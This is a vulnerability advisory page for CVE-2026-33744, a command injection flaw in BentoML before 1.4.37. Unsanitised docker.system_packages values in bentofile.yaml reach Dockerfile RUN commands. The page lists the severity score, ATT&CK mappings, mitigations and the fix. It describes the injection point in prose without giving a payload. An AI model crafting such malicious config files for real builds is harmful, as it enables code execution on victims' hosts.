CVE-2026-33744
Published: 27 March 2026
Summary
CVE-2026-33744 is a high-severity Code Injection (CWE-94) vulnerability in Bentoml Bentoml. Its CVSS base score is 7.8 (High).
Operationally, exploitation aligns with the MITRE ATT&CK technique Unix Shell (T1059.004); ranked at the 0.8th percentile by exploit likelihood (below the median); it is not currently listed in the CISA KEV catalog; a public proof-of-concept is referenced.
This vulnerability is AI-related — categorised as Machine Learning Libraries.
The strongest mitigations our analysis identified are NIST 800-53 SI-10 (Information Input Validation) and SI-2 (Flaw Remediation).
Threat & Defense at a Glance
Threat & Defense Details
Mitigating Controls (NIST 800-53 r5)AI
Requires timely remediation of identified flaws, such as patching BentoML to version 1.4.37 or later, which directly fixes the lack of sanitization in the docker.system_packages field.
Mandates input validation at application interfaces like bentoml containerize, rejecting arbitrary strings in docker.system_packages that could enable command injection during Docker builds.
Enforces restrictions on inputs to configuration files like bentofile.yaml, limiting docker.system_packages to valid OS package names and preventing shell command interpolation.
MITRE ATT&CK Enterprise TechniquesAI
Why these techniques?
Command injection into Dockerfile RUN via unsanitized bentofile.yaml enables Unix shell execution (T1059.004) when a user is tricked into processing the malicious config file with bentoml containerize or docker build (T1204.002).
NVD Description
BentoML is a Python library for building online serving systems optimized for AI apps and model inference. Prior to 1.4.37, the `docker.system_packages` field in `bentofile.yaml` accepts arbitrary strings that are interpolated directly into Dockerfile `RUN` commands without sanitization. Since `system_packages`…
more
is semantically a list of OS package names (data), users do not expect values to be interpreted as shell commands. A malicious `bentofile.yaml` achieves arbitrary command execution during `bentoml containerize` / `docker build`. Version 1.4.37 fixes the issue.
Deeper analysisAI
CVE-2026-33744 is a command injection vulnerability (CWE-94) in BentoML, a Python library for building online serving systems optimized for AI applications and model inference. Versions prior to 1.4.37 mishandle the `docker.system_packages` field in `bentofile.yaml` configuration files. This field, intended as a list of OS package names, accepts arbitrary strings that are interpolated directly into Dockerfile `RUN` commands without sanitization, allowing unexpected shell command execution. The vulnerability carries a CVSS v3.1 base score of 7.8 (AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H).
Exploitation requires a local attacker to supply a malicious `bentofile.yaml` file, tricking a user into executing `bentoml containerize` or `docker build` on the host system. No privileges are needed, but local access and user interaction are required to trigger the build process. Successful attacks achieve arbitrary command execution during the Docker build, with high impacts on confidentiality, integrity, and availability of the build environment.
The official BentoML GitHub security advisory (GHSA-jfjg-vc52-wqvf) documents the issue, stating that version 1.4.37 resolves it by addressing the lack of sanitization in the `docker.system_packages` field. Security practitioners should advise upgrading to BentoML 1.4.37 or later for affected deployments.
Details
- CWE(s)
Affected Products
AI Security AnalysisAI
- AI Category
- Machine Learning Libraries
- Risk Domain
- N/A
- OWASP Top 10 for LLMs 2025
- None mapped
- Classification Reason
- Matched keywords: ai